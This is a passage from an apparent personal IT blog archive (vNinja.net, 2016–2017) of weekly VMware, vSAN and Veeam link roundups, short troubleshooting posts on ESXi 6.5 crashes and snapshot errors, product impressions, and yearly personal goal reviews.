has tested the UNMAP fixes in ESXi 6.5, with great results. Glad this is back! High frequency of read operations on VMware Tools image may cause SD card corruption (2149257)(https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=2149257&sliceId=1&docTypeID=DT_KB_1_1&dialogID=355414078&stateId=1%200%20355416185) **This one is important! If you’re running ESXi 6.0 from SD cards, make sure to check this. No patch available for 6.5 yet though. My Windows 10 Template Build Process (https://thevirtualhorizon.com/2017/03/13/my-windows-10-template-build-process/)** Sean Massey has published his Windows 10 VM template process, loads of great tips and tricks for tuning your VDI templates here. How to build a Windows 2016 VMware Template An older article, but Michael White has a great guide on building a Windows 2016 template as well. [2-node vSAN topologies review (http://cormachogan.com/2017/03/10/2-node-vsan-topologies-review/) Newly appointed director Cormac goes through a couple of various 2-node vSAN topologies, and supported vSAN witness placement. vCenter 6.5b Resets Root Password Expiration Settings (https://lonesysadmin.net/2017/03/16/vcenter-6-5b-resets-root-password-expiration-settings/?utm_content=buffer3eb0c&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer)I've verified this in my own lab as well, and I think it’s very unfortunate that this upgrade to vCenter 6.5b does this. Shout-out to Bob Plankers for discovering this. Other / Longreads # A History and Future of the Rise of the Robots This Explains Why You’re Not as Productive as You Want to be ‘London Bridge is down’: the secret plan for the days after the Queen’s death --- # In The Bag #12 - Week 10 2017 URL: https://vNinja.net/inthebag/in-the-bag-12-week-10-2017/ Date: 2017-03-10 Author: christian Tags: InTheBag. Weekly, News Welcome to the twelfth edition of In The Bag! # _ In The Bag #12 - Week 10 2017 Technology # Cloud outages and the couch architects all over the world — Luca has written a great article about the recent AWS S3 outage, it’s sane, articulate and well worth a read. What’s New in VMware Validated Design for Software-Defined Data Center 4.0 – I’m a huge fan of the VVD, and the new additions in 4.0 are highlighted in this great video. Yes, Ransomware can delete your Veeam backups Oops. Naturally, if your Veeam repository is available in the network, well, things like this might happen. Make sure to design accordingly. VMware Predictive Distributed Resource Scheduler— Another new video from VMware, explaining the new Predictive DRS feature. PowerCLI module for Proactive HA (including simulation) — Of course, this one has to come from William. Check out his new PowerCLI module for configuring and simulating Proactive HA in vSphere 6.5 Other # ‘I thought I was smarter than almost everybody’: my double life as a KGB agent Trump, Putin, and the New Cold War Amazingly long and thorough article by The New Yorker. Spend some time on this one. The death of rock and roll, part 1,368: The Donald, Foo Fighters first album, and exceeding expectations A story on how Dave Grohl managed to release the first Foo Fighters album, exceeding pretty much everyones expectations at the same time. I can relate to this as a huge Nirvana, and now Foo Fighters fan. --- # In The Bag #11 - Week 9 2017 URL: https://vNinja.net/inthebag/in-the-bag-11-week-9-2017/ Date: 2017-03-03 Author: christian Tags: InTheBag, News, Weekly Welcome to the eleventh edition of In The Bag! Photo by Andrew Furlan In The Bag #11 - Week 9 2017 # Technology # RVTools 3.9.2 (February, 2017) — One of my favourite, and free, tools for VMware environments has been updated include support for vSphere 6.5. Use LogInsight as your VMware Security Dashboard[Edward Haletky] —(https://twitter.com/texiwill) has created a Log Insight content pack, with a security focus. This article by Christian Klose shows how you can use it to create a security dashboard. Good stuff! Free ITIL training – Perhaps not the most sexy topic out there, but some basic ITIL training is something everyone needs — Even if you don’t utilise in your organisation. 360 Troubleshooting with vRealize Operations and vRealize Log Insight — Good video from VMware, showing how Operations and Log Insight can work together. Other # Advice to my millennial kids— Great article from John Biggs, read it and then send it to your kids. The Story of Heady Topper, America’s Most Loved Craft Beer — Mmm, beer. This is one I haven’t had yet. Yes, I’m taking deliveries of if someone volunteers. --- # In The Bag #10 - Week 8 2017 URL: https://vNinja.net/inthebag/in-the-bag-10-week-8-2017/ Date: 2017-02-26 Author: christian Tags: InTheBag, News, Weekly Welcome to the tenth edition of In The Bag! This one comes a little late, it’s (barely) Sunday here, not Friday! Sorry about that, but I was “stuck” in a secure facility all week, doing a vSphere 5.5 til vSphere 6.5 migration. Photo by Frontline Creative In The Bag #10 - Week 8 2017 # Technology # osx-wificleaner — Over time, we all accumulate a bunch of open networks that we’ve connected to — you do use a while connected to those, right? This little MacOS script will clean those right out of your network list, which is a good thing. For one, cleaning out those open networks makes sure your laptops doesn’t reconnect to them automatically, and secondly manually cleaning up that list is pretty tedious after a while. VMware Technical Papers — Handy little site that makes it easy to find those Technical Papers you’re looking for. Filter by product and read your heart out. VMware IOInsight — Nice new Fling from VMware Labs. Ever wondered how your VMs IO characteristics are? Well, IOInsight will give you that, erm, insight in a web based GUI. How I Ruined Office Productivity With a Face-Replacing Slack Bot — And people say slackbots are useless. Other # Complicated. Weird. Beautiful! The secret Google project to put an aquarium full of tiny, wiggly water bears inside your phone — Yes. Of course. Whut? I bet the new Nokia 3310 won’t have that! A Conversation With Brian Eno About Ambient Music — Well worth a read. I’m not big on ambient much as such, I’m still mostly stuck in my long-gone youth and 90’s grunge, but I might just be coming around. That’s it for this week — Enjoy your week to come. --- # VMware vSphere 6.5 PSOD: GP Exception 13 URL: https://vNinja.net/vmware-2/vmware-vsphere-6-5-psod-gp-exception-13/ Date: 2017-02-25 Author: christian Tags: 6.5, ESXi, KB, vSphere While at a customer site, migrating an old vSphere 5.5 environment to 6.5, several hosts suddenly crashed with a PSOD during the migration. Long story short, we got hit by this: VMware KB 2147958: ESXi 6.5 host fails with PSOD: GP Exception 13 in multiple VMM world at VmAnon_AllocVmmPages (2147958) It turned out that a bunch of the VMs we were vMotioning from the old environment had the cpuid.corePerSocket advanced setting set in the .vmx file, and this can cause ESXi 6.5 to enter a state of panic, and in our case it certainly did. Upgrading the hosts to 6.5a, like the knowledgebase article states, alleviated the issue and we did not experience PSOD’s again while migrating the 100+ VMs from the old environment to the new one. --- # In The Bag #9 - Week 7 2017 URL: https://vNinja.net/virtualization/in-the-bag-9-week-7-2017/ Date: 2017-02-17 Author: christian Tags: InTheBag, News, Weekly Welcome to the ninth edition of _In The Bag! _ Photo by James Sutton In The Bag #9 - Week 7 2017 # Technology # Setting the record straight on DRS, pDRS and Workload Placement — How does DRS and pDRS work, really? What metrics are the basis for decisions, and how often are the calculations done? Extending the Capabilities of vRealize Automation 7 — Eric Shanks Pluralsight courses on vRealize Automation are great, and this new-one is no exception. Using vRealize Log Insight Content Pack for vSAN for better visibility — I love logs. Perhaps not as much as my former colleague Espen, but still, logs are extremely useful. Even if there is no immediate fire or apparent problems, log files are important. Designing vSAN Networks – Why Should I Use the Distributed Switch? — The short answer is yes. The why, is clearly illustrated in this article Other # Rush - Tom Sawyer Guitar, Drums, Vocals SIMULTANEOUSLY! Wow. I’m having problems learning to play guitar, and that’s one thing at at time. Experience: I accidentally bought a giant pig — It’s just one of those things you know, the things that just happen… That’s it for this week — Enjoy your weekend! --- # In The Bag #8 - Week 6 2017 URL: https://vNinja.net/inthebag/in-the-bag-8-week-6-2017/ Date: 2017-02-10 Author: christian Tags: InTheBag, News, Weekly Welcome to the eight edition of In The Bag! Photo by Benjamin Child In The Bag #8 - Week 6 2017 # Technology # Understanding Recovery from Multiple Failures in a vSAN Stretched Cluster — One of the more important things to understand is how to deal with failures in IT-infrastructure, and this is a great write-up from Cormac. What logs do I get when I enable syslog in VCSA 6.5? — As with a lot of things vCenter Server Appliance (VCSA) 6.5, things have changed in v6.5. William highlights what’s happened with remote syslogging in the latest release. Which logs gets forwarded, and where. Important stuff. Homelab: Downsizing vCenter Server Appliance 6.5 — The VCSA 6.5 is pretty greedy when it comes to memory resources. This is a handy guide if you need to downsize it a bit for your home lab. Veeam Backup & Replication 9.x Application Events — Great PDF that lists all application events that can show up in Windows logs for Veeam B&R. The VMware vExpert 2017 and Veeam Vanguard 2017 lists are out. — Congrats to all! Other # I Work from Home I am sure a lot of us can relate to this excellent piece by Colin Nissan for The New Yorker. No more eating and no more meerkat videos, O.K.? Ball in play for a total of 16 minutes and 4 seconds during Super Bowl LI 16 minutes and 4 seconds game play, 130 30 second commercials. Makes sense… That’s it for the week — Enjoy your weekend! --- # In The Bag #7 - Week 5 2017 URL: https://vNinja.net/inthebag/in-the-bag-7-week-5-2017/ Date: 2017-02-03 Author: christian Tags: InTheBag, News, Weekly Welcome to the seventh edition of In The Bag! Photo by NordWood Themes In The Bag #7 - Week 5 2017 # Technology # #vSAN Cache Performance Dashboard in #vROps — Simon Eady has created a great vROps dashboard for vSAN cache information. Check it out! vSAN: Update Guide for Dell PERC9 H730 Controller — Perfectly timed, I’m in the process of setting up our internal vSAN based lab-environment at the moment. I have to say, I do love the storagehub.vmware.com content (and layout). It’s a real Treasure trove of great information. Free eBook: VMware NSX® Micro-segmentation Day 1 — Wade Holmes and VMware has released a free NSX Micro-segmentation book. Looks like a great resource! GitLab messed up, and had a major meltdown. — I can’t help but feel for the GitLab crew, but man they’ve set a new standard when it comes to transparency in the face of major events. This is the most honest, and brutal, incident management I’ve seen to date, they even broadcasted their recovery work live on YouTube. Other # Tin Foil Hats Actually Make it Easier for the Government to Track Your Thoughts — This is an older article (2012) from The Atlantic, but it’s still a good piece. Be sure to tightly pack your tin foil from now on. Loose won’t do it. Hear Ryan Adams’ Haunting Cover of Radiohead’s ‘Karma Police’ — Great live cover by the cover-master Ryan Adams. I can’t wait for the real-deal with Radiohead playing on Oslo in June though. Now, where are my tickets again? Great Teams Are About Personalities, Not Just Skills — Building a proper team is hard work, and it’s not as easy as you might think. It’s not just a simple matter of putting brilliantly good people together (which is hard enough in itself), but you also need to factor in personality types and other traits to make sure that 1+1 equals more than 2. If you don’t finish your work then you’re just busy, not productive — I can really relate to this, as this is one of my main problems. I’m very good at starting new projects, I’m just not very good at actually finished them. That’s it for the week — Enjoy your weekend! --- # ESXi Snapshot Problems: msg.snapshot.error-QUIESCINGERROR URL: https://vNinja.net/vmware-2/esxi-snapshot-problems-msg-snapshot-error-quiescingerror/ Date: 2017-02-01 Author: christian Tags: ESXi, NTP, Snapshot, vSphere Photo by Sonja Langford Just a quick post about something I experienced at a client, with ESXi 6.0 hosts, today: If you have trouble performing VMware snapshots, and see a msg.snapshot.error-QUIESCINGERROR error, check the host time settings and NTP. In this case, snapshots of VMs located on other hosts in the cluster were fine, but once a VM was moved to the new host, snapshot operations failed after an hour or so. It turns out a new host in the cluster was not properly set up to use NTP, and time drift between the host and the vCenter caused the snapshot failures. Correcting the time on the host and configuring NTP resolved the issue. Always remember: If the problem isn’t DNS, it almost certainly is NTP. --- # In The Bag #6 - Week 4 2017 URL: https://vNinja.net/inthebag/in-the-bag-6-week-4-2017/ Date: 2017-01-27 Author: christian Tags: InTheBag, News, Weekly Welcome to the sixth edition of In The Bag! It’s been a while since I’ve posted one of these, but here’s giving it a a go in 2017 as well. # In The Bag #6 - Week 4 2017 # Technology # ReFS cluster size with Veeam Backup & Replication: 64KB or 4KB? — My friend Luca has written a great article explaining how to determine the best cluster size for a ReFS based Veeam B&R repository. AWS for VMware Admins – London VMUG Slide Deck — Great presentation by Alex Galbraith and Chris Porter from the London VMUG. Lots of useful information there for those well versed in the VMware universe, but curious on what AWS have to offer. Architecting a vSAN Cluster (part 1) — This first is the first in a series of posts (hopefully), and Francis Daly is off to a great start. Especially in regards to disk group design in a vSAN cluster. Designing vSAN Networks – Using Multiple Interfaces? — Good primer on how you can, and should, configure multiple NICs for your vSAN traffic. UserCon 2016: Closing keynote: Frank Denneman - VMware Cloud on AWS A closer look — Frank Denneman’s closing keynote from the Nordic VMUG 2016. No one, other than Frank, does a closing keynote wearing a Warriors hoodie. Other # 10 Artists Who’ve Honored David Bowie with Stunning Covers of His Music — I love a good cover and these are good. ‘Singles’ Soundtrack Reissue to Contain Grunge-Era Rarities — I need to buy some new vinyl come May! Worst Tech Predictions Of The Past 100 years — Not sure how many of these are actually real, but still a fun read. --- # 2017 — You Better Deliver URL: https://vNinja.net/misc/2017-you-better-deliver/ Date: 2017-01-15 Author: christian Tags: 2017, Plans Considering it’s mid-january 2017 already, it’s time to do my annual goal list for the new year. My goals for 2017: # Get that VCAP6-DCV Design exam out of the way — I did the beta in march 2016, but missed the mark by a small margin. AWS Associate Certifications — Not sure how many of the three exams I want to do yet, but I’m going to at least give the AWS Certified Solutions Architect exam a go. Learn something new — This ties into the previous goal a bit, but I will try to allocate time to learning something new every month. Some times it might be tech, some times it might be soft skills. I’ve purchased a few Udemy courses with this in mind already. Attend an industry conference — Most likely VMworld Barcelona in September. Continue to build the SDDC practice at Proact — The foundations laid in 2016 were awesome. 2017 is the year we have to start executing and delivering on it. vNinja.net — Keep posting whenever I feel like it, but try to keep the “In the Bag"-series going. Photography — Take up photography as a hobby again, I’ve been quiet on that front for quite a while and I miss the creative outlet it provides. With upcoming trips to Liverpool (Liverpool FC vs Arsenal) in march, Radiohead concert in Oslo in June, and the Secret Solstice festival on Iceland also in June, there should be plenty of opportunities in 2017. I also have a few other personal goals for 2017 that are not listed here, but I’ll keep myself accountable for those as well. Some of them were posted in my 2016 review post: I need to get better at planning things out, not just adding a todo item and think that somehow magically makes you more productive. Having a lot of todo items doesn’t really help, unless you plan out how to accomplish them. This is one thing I aim on improving in 2017; breaking bigger tasks into smaller ones to make them manageable and attainable. Clearer focus. This is a continuation of the previous point, but must get better at channeling energy into the tasks at hand, not on everything all at once. Set up time slots, and use them. Get more sleep. I sleep way to little, and that needs to change drastically. So, bring it on 2017. I think I’m ready for my closeup now. --- # Evaluating 2016 URL: https://vNinja.net/misc/evaluating-2016/ Date: 2016-12-25 Author: christian Tags: 2016, Review Back in February 2016 I published my goals for 2016, and it’s time to review that list: Shake things up a bit – Go big or go home. This one is easy, in April 2016 I moved from EVRY to Proact, with a clear mission statement: Build and develop Norways best SDDC team. As is always the case when changing positions and companies, a lot of time is spent on getting to know the new organisation but we’re getting there. More news on this in 2017, but things are looking good going forward. We’ve built a solid foundation in 2016! Score: 8/10 Get VCIX certified This was a miserable failure. I sat the 3V0-622: VMware Certified Advanced Professional 6 – Data Center Virtualization Design Beta Exam in march, but failed it. It was close (I just recently got my score report!), but no sigar. Due to lots of other time consuming things going on in 2016, I’ve not had a second attempt at it yet. Score: 2/10 Keep vSoup on track Another failure, 3 published podcasts in 2016, not even close to the monthly target. We’ve been doing the vSoup podcast since 2011, and a lot of things have changed for all three of us. Not sure how 2017 looks in the regard either. Score: 2/10 VMUG The norwegian VMUG is still healthy, but I haven’t been able to contribute as much as I’ve wanted in 2016, also due to time constraints. Score: 5/10 Attend an international industry conference I did get to attend VMworld in Barcelona in 2016, which was awesome after missing out last year. Score: 10/10 Code something Nope, not this year. Too much other stuff on my plate. I haven’t made any real code, but I’ve developed a lot of other stuff that will come in handy in 2017 (related to the top entry in this list), but nothing that really qualifies as code. Score: 0/10 So, all in all that gives me a personal score of 28 of a possible 60. Wow, that’s pretty bad. Not quite what I had in mind for 2016, but I’m very unhappy that my top-most item got an 8. That one should be weighted higher than the rest anyway. Sure, I can “blame” some of the lack of progress on a few of these items on the role/employer change, but not all of it – some of it is purely a personal lack of ability to power through. 2016 has taught me a few valuable lessons: # I need to get better at planning things out, not just adding a todo item and thing that magically makes you more productive. Having a lot of todo items doesn’t really help, unless you plan out how to accomplish them. This is one thing I aim on improving in 2016; breaking bigger tasks into smaller ones to make them manageable and attainable. Clearer focus. This ties into the previous point, but must get better at channeling energy into the tasks at hand, not on everything all at once. Set up time slots, and use them, for the tasks that needs to be done. I sleep way to little, and that needs to change drastically. Now it’s time to carve out and publish the plan for 2017. Let’s see if I’ve actually learned anything at all… --- # In The Bag #5 - Week 48 URL: https://vNinja.net/inthebag/in-the-bag-5-week-48/ Date: 2016-12-02 Author: christian Tags: InTheBag, News, Weekly Welcome to the fifth edition of In The Bag! Photo by Joshua Earle In The Bag #5 - Week 48 Technology # Send a Tweet Directly from a VMware ESXi Host — Admittedly sending Tweets from an ESXi hosts doesn’t really make much sense, but as an example of how to use the new Script Bundle feature in Auto Deploy for vSphere 6.5 it’s pretty cool — Kudos Eric Gray OPBOT - Connect VMware vSphere and Slack — Ok, this is right up my alley. Opvizor has created what they call a Virtual Assistant for vSphere. Basically this is an appliance you deploy in your environment (stripped down Debian), which lets you connect your Slack channel to your vSphere environment and then lets you issue (read only) commands to it. Quick Look – vSphere 6.5 Storage Space Reclamation — Anthony Spiteri wrote this most excellent guide to how UNMAP works in vSphere 6.5. Once in a while (honestly, more often than you would think) someone beats me to posting something, and this is one of those times. Very glad to see automated UNMAP being re-introduced in 6.5. Predictive DRS Walk Through — Another awesome feature made possible by the combination of vSphere 6.5 and vRealize Operations 6.4. Have a look at the video, it explains it all. Getting Started with vRealize Automation 7 — Eric Shanks has a new course available on Pluralsight. I’ve had a quick look at this one, and it looks awesome. Definitely bookmarked for later! Amazon Re:Invent New Products and Services — Wow, lots and lots of new interesting AWS things to play with. To be honest I haven’t looked at it all yet, but this is quite the list. Other # Recommended Reading — Justin Warren has a list of his recommended books and essays, covering a wide variety of topics. Well worth checking out! Life Gets (a Lot) Better When You Stop Giving a F*ck — The title pretty much says it all, do yourself a favour and spend 5 minutes reading Thomas Oppongs article. More young people are watching Planet Earth 2 than The X Factor — There is hope after all! That’s it for this week, a new one is in the works for next Friday. --- # In The Bag #4 - Week 47 URL: https://vNinja.net/inthebag/in-the-bag-4-week-47/ Date: 2016-11-25 Author: christian Tags: InTheBag, News, Weeky Welcome to the fourth edition of In The Bag! Photo by Sonny Abesamis In The Bag #4 - Week 47 Technology # Capacity Expansion & Disk Group Design Decisions–All Flash vSAN Every design decision has a consequence, and thats also the case when it comes to vSAN. Jason Langer has written a great article highlighting how enabling deduplication and compression has consequences for drive failure scenarios. Veeam Backup & Replication and vSAN integration deep dive Great deep dive by Luca into how Veeam B&R integrates with vSAN and uses that tight integration to speed up backup and minimise network traffic in the process. vGhetto Automated vSphere Lab Deployment for vSphere 6.0u2 & vSphere 6.5 William has yet again knocked it out of the park, this time by creating a PowerCLI script that rolls out nested ESXi environments with vSAN like there is no tomorrow. Much love for this; I’ve already run it a few times in my own lab environment. Other # The Fascinating Science Behind ‘Talking’ With Your Hands — I admit it, and everyone who has ever seen me do a presentation or talk can verify it, I’m a “hand-talker”, and this is also why I hate using hand-held microphones. I forget, and move my hands around all over place. Tiny Desk: how NPR’s intimate concert series earned a cult following — There is something about live, not overproduced and raw music that appeals to me. The Tiny Desk recordings are fun, quirky and sometimes you can even spot that the artists gets it wrong. Great stuff. I particularly like the set played by Death Cab for Cutie. The Most Influential Images of All Time — Time has created a list of what they think are the most influential images of all time, and it’s a great one. A bunch of these are really interesting, both from an historic perspective, but also from a photography one. Special # This week I’ve decided to add a new section. This “Special” section will some times pop up, pretty randomly, if there is something in particular that caught my attention this week. Safe to say, this week there was. Lars Trøen, one of the longest “serving” vExperts, fellow Norwegian and all-around good guy recorded a video expressing his undying love for VMware Workstation. So here he is, in all his glory: That’s it for this week, a new one is in the works for next friday --- # macOS: Spectacle URL: https://vNinja.net/osx/macos-spectacle/ Date: 2016-11-24 Author: christian Tags: macOS, Recommended, Spectacle Working with the keyboard to move resize, focus and arrange your applications is a great productivity tip. When I changed from Windows to macOS a few years ago, I had a pretty convoluted setup based on Slate for managing keyboard shortcuts, especially for moving applications around, but this has since been simplified by using Spectacle instead of Slate. Spectacle has everything I need, especially keyboard shortcuts for maximising an application, of “flinging” it over to another display. Spectacle is free and comes highly recommended, give it a try! --- # Facelift URL: https://vNinja.net/news/facelift/ Date: 2016-11-24 Author: christian Tags: Facelift, Theme, Wordpress I have given the site a small facelift, replacing the old theme with a new and cleaner version. For some reason, I get this “theme itch” a couple of times a year, but usually I manage to let it pass without doing many changes. This time it stuck with me though, and ended up with replacing the old theme with a new one. In fact, the old theme had been active for close to two years now, so it was time to shake things up a bit any way. The new theme gives the site a fresh and in my opinion better look. The double menus in the header makes it look more organised, and less cluttered and the static navigation header is something I’ve wanted to have for a long time now. It just looks simpler and cleaner, especially with regards to font faces and sizes. Simplicity is the ultimate sophistication. — Leonardo da Vinci If you come across anything that looks weird or out of place, please let me know! --- # Got VMware vRealize Log Insight? URL: https://vNinja.net/virtualization/got-vmware-vrealize-log-insight/ Date: 2016-11-23 Author: christian Tags: Free, Log Insight, Software, VMware Recent conversations with existing and potential clients made me realize that many are not aware that they most likely are entitled to use VMware vRealize Log Insight in their environment. For free. Back in March 2016 VMware announced that everyone with a valid VMware vCenter license are also entitled to 25-OSI pack of vRealize Log Insight for vCenter Server. This means that you can gather logs for up to 25 ESXi hosts, VMs or other devices, in your environment. It even allows you to use the following VMware content packs (3rd party content packs requires a full Log Insight license) Horizon View NSX OpenStack vCenter Operations Manager vCloud Automation Center vCloud Director vCNS Virtual SAN vRealize Automation vRealize Operations Manager vSphere This should be a no-brainer for everyone with a >24 host VMware vSphere environment, the value that vRealize Log Insight provides is enormous, especially when it comes to troubleshooting. Why 24 when you get a 25 pack you may ask? Well, you’ll want to use one of them for vCenter itself, leaving 24 for your ESXi hosts. If your environment is smaller than 24 hosts, the remaining OSI’s can be used to monitor just about anything that can log to a syslog service, like switches, routers and other devices. Credits: gratisography.com So, if you’re not running it already, logon to my.vmware.com and download it today — you can then use your existing vCenter license to activate it. You’ll be drinking from the log-hose in no time. --- # VMware vSAN: 2016 Edition URL: https://vNinja.net/virtualization/vmware-vsan-2016-edition/ Date: 2016-11-23 Author: christian Tags: storage, VMware, VSAN Both in 2014 and in 2015 I wrote pieces on the current status of VMware vSAN, and it’s time to revisit it for 2016. My previous posts: 2014: VSAN: The Unspoken Future 2015: VMware VSAN: More than meets the eye. vSAN 6.5 was released with vSphere 6.5, and brings a few new features to the table: Virtual SAN iSCSI Target Service Support for Cloud Native Apps running on the Photon Platform REST APIs and Enhanced PowerCLI support 2-Node Direct Connect Witness Traffic Separation for ROBO All-Flash support in the standard license (Deduplication and compression still needs advanced or enterprise) 512e drive support In my opinion, the first three items on that list are the most interesting. Back in 2015 I talked about VMware turning vSAN into a generic storage platform, and the new Virtual SAN iSCSI Target Service is a step in that direction. This new feature allows you to share vSAN storage directly to physical servers over iSCSI (VMware is not positioning this as a replacement for ordinary iSCSI SAN arrays), without having to do that through iSCSI targets running inside a VM. The same goes for Cloud Native Apps support, where new applications can talk with vSAN directly through the API, even without a vCenter! Both of these bypass the VM layer entirely, and provide external connectivity into the core vSAN storage layer. Clearly these are the first steps towards opening up vSAN for external usage, expect to see more interfaces being exposed externally in future releases. An object store resembling Amazon S3 doesn’t sound too far fetched, does it? Perhaps even with back-end replication and archiving built-in. Stick your files in a vSAN and let the policies there determine which object should be stored locally, and which should be stored on S3? Or which should be replicated to another vSAN cluster, located somewhere else? Being able to use SBPM for more than VM objects is a good idea, and it makes management of those non-VM workloads running in your vSAN cluster easier to monitor and manage. Sure the rest of the items on the list are nice too, the two 2-node Direct Connect feature allows you to connect two nodes without the need for external 10 GbE switches, cutting costs in those scenarios. All-Flash support on all license levels is also nice, but as is the case with 512e drive support, it’s natural progression. With the current price point on flash devices, the vSAN Hybrid model is not going to get used much going forward. All in all, the vSAN 6.5 release is a natural evolution of a storage product that’s still in it’s infancy. That’s the beauty of SDS, new features like this can be made available without having to wait for a hardware refresh. --- # Cohesity: My Initial Impression URL: https://vNinja.net/virtualization/cohesity-my-initial-impression/ Date: 2016-11-22 Author: christian Tags: Backup, Cohesity, storage A few weeks back Cohesity gave me access to a lab environment, where I could play around with their HyperConverged Secondary Data solution. For those unaware of their offering entails, it’s simply put a solution for managing secondary storage. In this case, secondary storage is really everything that isn’t mission critical. It can be your backups, test/dev workloads, file shares and so on . The idea to place these unstructured data sets on a secondary storage platform, to ease management and analytics but at the same time keep it integrated with the rest of the existing environment. It’s a Distributed scale-out platform, with a pay-as-you-grow model. Currently Cohesity supports both SMB and NFS as data entry points, and it also supports acting as a front-end for Google Cloud Storage Nearline, Microsoft Azure, Amazon S3 and Glacier. Partial Feature List # I won’t go through a complete feature list for the current v3.0 offering, but here are a few highlights: Replication between Cohesity Clusters Physical Windows and Linux support (in addition to VMs) Single object restore for MS SQL, MS Sharepoint and MS Exchange. Archival of data to Azure, Amazon, Google Tape support Data Analytics Getting data out of your VMs, and onto a secondary storage tier makes sense, even more so when you can replicate that data out of your datacenter as well. This makes your VMs smaller and thus easier to manage. Naturally I was most interested in looking at this from a vSphere perspective, and that’s what I had a look at in the lab. Backups and Clones are presented back to the vSphere environment using NFS, something that enables quick restore and cloning without massive data transfers to get started. Without any introduction to the product what so-ever I was able to create Protection Jobs (backups) and clone VMs directly from the Cohesity interface. Creating Protection Jobs: # Creating a Proection Job is easy, select the VMs you want to protect from the infrastructure: Select, or create a Protection Policy (did I mention it’s policy driven?) Watch the backups run Creating Clones # The procedure for clone jobs is equally simple The Cohesity 3.0 UI is beautiful and easy to work with. As I mentioned in my tweet after looking at this for a little under an hour: Been playing around with @cohesity this evening. First impression: not bad guys, not bad at all. — Christian Mohn™ (@h0bbel) November 5, 2016 It’ll be interesting to see where this moves from here, but from a purely technical point of view the current offering looks pretty darn good! Of course, I’ve only scratched the surface here playing with backup/restore and cloning only, the platform has much more to offer besides that. --- # Nordic VMUG UserCon 2016 URL: https://vNinja.net/news/nordic-vmug-usercon-2016/ Date: 2016-11-19 Author: christian Tags: Nordic, UserCon, vDM30in30, VMUG The 2016 Nordic VMUG UserCon in Copenhagen, Denmark, is just 11 days away, and if you haven’t registered already now is the time to do so. As usual the speaker lineup for the event is awesome, with a lot of the usual suspects like Duncan Epping (VMware), Cormac Hogan (VMware), Lee Dilworth (VMware), and Frank Denneman (VMware), but VMware is also showing it’s commitment to VMUG by sending some non-europeans as well, like Grant Orchard and_ Mike Foley_. This, coupled with “local” speakers like Michael Ryom, Nicolai Sandager and Marteinn Sigurdsson this promises to be every bit as awesome as the event was last year. I was lucky enough to attend last year, and I even had a speaker slot. To be honest, I had submitted (and gotten approval for) a session this year as well, but ultimately I’ll be unable to attend due to circumstances out of my control. Sadly there isn’t anything I can do about that, as I would have loved to be there again. I’m really bummed out that I won’t be able to see Simon Eady’s Building Self Healing Environments with vRealize Operations Manager session! Have a look at the agenda, and register today. Join 400 of your peers at the event to attend in the nordics this year! Again, big kudos to the danish VMUG team who puts this together every year. You’re doing an awesome organising this! --- # In The Bag #3 - Week 46 URL: https://vNinja.net/virtualization/in-the-bag-3-week-46/ Date: 2016-11-18 Author: christian Tags: InTheBag, News, vDM30in30 Welcome to the third edition of In The Bag! Photo by Sonny Abesamis In The Bag #3 - Week 46 Technology # Slow news week, not much happening really. Oh wait, there was this thing called vSphere 6.5 that was released. William Lam has the lowdown in his All vSphere 6.5 release notes & download links post. Please read the release notes. They are important. Veeam Availability Suite 9.5 was released too. No vSphere 6.5 support as of yet, so if you depend on Veeam Backup and Replication for your backup needs it’s best to wait a bit. How the Top vBlogs are performing (or how to optimize your WordPress site) Eric Siebert has written a nice article to show how you can optimise your website, and get a nice Grade A. This site needs a run through that as well, mostly due to some laziness on my part. Regex that only matches itself Regular expressions, or Regexp scares me. I’ve never gotten to grips with it, and when someone does something like this my face goes numb and my mind goes blank. Other # Classic Pop Songs, Reimagined as Infographics This is fun! How many of these song lyrics can you recognise from the infographics? The Lost Civilization of Dial-Up Bulletin Board Systems I grew up on Bulletin Board Systems (BBS), literally. Back in the early 90’s I even ran one of my own, with a dedicated phone line and all. Little know fact: That BBS is still up and running today! Leonard Cohen on Kurt Cobain’s Nirvana lyric name-check: ‘I’m sorry I couldn’t have spoken to the young man’ Yes, another Nirvana related link. Sorry (not sorry). That’s it for this week, a new one is in the works for next friday --- # VMworld Dates 2017 URL: https://vNinja.net/news/vmworld-dates-2017/ Date: 2016-11-18 Author: christian Tags: 2017, News, VMworld Now that the seasons have changed, it’s time to look at 2017 and start planning the year. First up, when is VMworld 2017, and perhaps most importantly where? There has been a lot of speculation about this, and the perhaps strongest rumour was that it was moving to Berlin. The details for the US has already been posted on vmworld.com, but for Europe all it says is “Fall”. According to Duncan, which usually is in the know, VMworld Europe 2017 will once again be in Barcelona, but in September instead of October. The venue is yet to be announced, so here might be a change from the Fira. Update: The venue in Barcelona has now been confirmed at Fira Gran Via as per usual. VMworld 2017 US August 27 – August 31 Las Vegas | Mandalay Bay Hotel & Convention Center VMworld 2017 Europe September 11 – September 14 Barcelona | Fira Gran Via So there it is, block those dates in your calendar, and start working on getting permission and funding now. Budgets for 2017 are being finalised now, so it’s probably a good idea to get your request in early. --- # Generating Random Data in Linux URL: https://vNinja.net/virtualization/generating-random-data-in-linux/ Date: 2016-11-15 Author: christian Tags: fun, Lab, Linux, Veeam Backup & Replication, VM I’ve been fleshing out a proper Veeam Backup & Replication Demo lab at work, but doing demos on static VMs isn’t all that much fun and doesn’t really give us much. Doing scheduled backups of non-changing data is really boring. So, in order to get some changes done on the file system on a few Linux VMs running in the environment, I came up with the following solution: I set up a crontab entry that generates a file with random data in it a couple of times a day, just to make sure that there are some changes made to the VM. The crontab entry looks like this: 0 03,09,13,22 * * * head -c 1G </dev/urandom >/tmp/randomdata This generates a 1 GB file called _randomdata _in /tmp filled with content from /dev/urandom at a couple of different times a day. This ensures that there are at least 1GB of changes for each backup cycle, and gives Veeam Backup & Replication something to work with. --- # In The Bag #2 - Week 45 URL: https://vNinja.net/inthebag/in-the-bag-2-week-45/ Date: 2016-11-11 Author: christian Tags: InTheBag, News, vDM30in30 Welcome to the second edition of In The Bag! Photo by Sonny Abesamis In The Bag #2 - Week 45 Technology # vSAN 6.5 Licensing Guide The vSAN 6.5 Licensing Guide is now available, worth noticing is that All Flash (but not compression/dedup and RAID5/6) is now available in the Standard edition. Also nice to see that the new iSCSI Target Service is also included in Standard. Continuous Network Monitoring With Slack Alerting You may have noticed that I’ve got a bit mad with my own Slack channel alerting, but Jerry Gamblin has taken it even further with automated nmap scanning as well. Nice job! The difference between VM Encryption in vSphere 6.5 and vSAN encryption Duncan has posted this nice clarification on the differences between VM Encryption and the upcoming vSAN encryption feature (it’s in the current beta, not in the upcoming 6.5 release). This clarification was 